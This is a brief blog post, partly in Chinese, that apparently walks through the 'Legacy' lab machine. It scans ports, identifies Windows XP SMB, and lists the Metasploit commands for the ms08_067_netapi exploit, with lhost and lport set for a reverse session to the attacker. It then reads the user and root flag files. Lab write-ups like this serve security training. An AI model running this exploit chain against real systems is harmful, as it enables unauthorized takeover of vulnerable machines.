Legacy
Posted by admin on 2020年2月20日
Legacy
zenmap扫描端口
扫描出smb os为XP
Google:windows xp smb exploit
使用msf get system权限
use exploit/windows/smb/ms08_067_netapi
set lhost 10.10.14.45
set lport 4444
set rhost 10.10.10.4
run
get user.txt | root.txt
type C:\"Documents and Settings"\john\Desktop\user.txt
type C:\"Documents and Settings"\Administrator\Desktop\root.txt